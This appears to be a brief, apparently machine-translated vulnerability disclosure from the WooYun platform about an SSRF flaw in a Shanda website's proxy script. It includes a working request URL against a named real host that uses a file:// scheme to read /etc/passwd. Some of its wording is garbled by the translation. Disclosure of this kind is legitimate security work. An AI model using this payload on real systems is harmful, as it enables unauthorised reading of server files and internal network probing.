漏洞标题 SSRF可以读取本地文件并检测盛大站的内部网 相关制造商 盛大的比赛 漏洞作者 过路人 提交时间 2016-05-06 16: 31 公共时间 2016-06-20 16: 40 漏洞类型 任何文件遍历/下载 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 任何文件读取，任意文件读取和使用 漏洞详细信息 SSRF可以读取本地文件并检测盛大站的内部网 http://vku.sdo.com/proxy.php?name=1&pwd=11&src_url=file: ///etc/passwd 漏洞证明： 修理计划： 被遗弃的车站及时 版权声明：请注明出处。居民A @乌云